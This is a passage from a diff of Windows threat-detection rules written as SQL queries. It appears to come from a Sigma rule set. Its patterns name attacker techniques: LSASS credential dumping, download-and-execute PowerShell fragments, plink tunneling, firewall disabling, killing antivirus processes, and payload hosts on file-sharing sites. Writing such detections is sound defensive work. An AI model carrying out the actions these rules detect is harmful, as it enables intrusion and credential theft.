'%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "status": "test", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.privilege_escalation", + "attack.t1068", "attack.execution", - "attack.persistence" + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Execution of plink to perform data exfiltration and tunneling", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.t1053.005" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Administrative activity", + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "status": "test", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", - "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "title": "Windows Share Mount Via Net.EXE", + "id": "f117933c-980c-4f78-b384-e3d838111165", + "status": "experimental", + "description": "Detects when a share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Legitimate activity by administrators and scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_net_use_mount_share.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.t1202" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" - }, - { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of Setres" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Exotic software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR 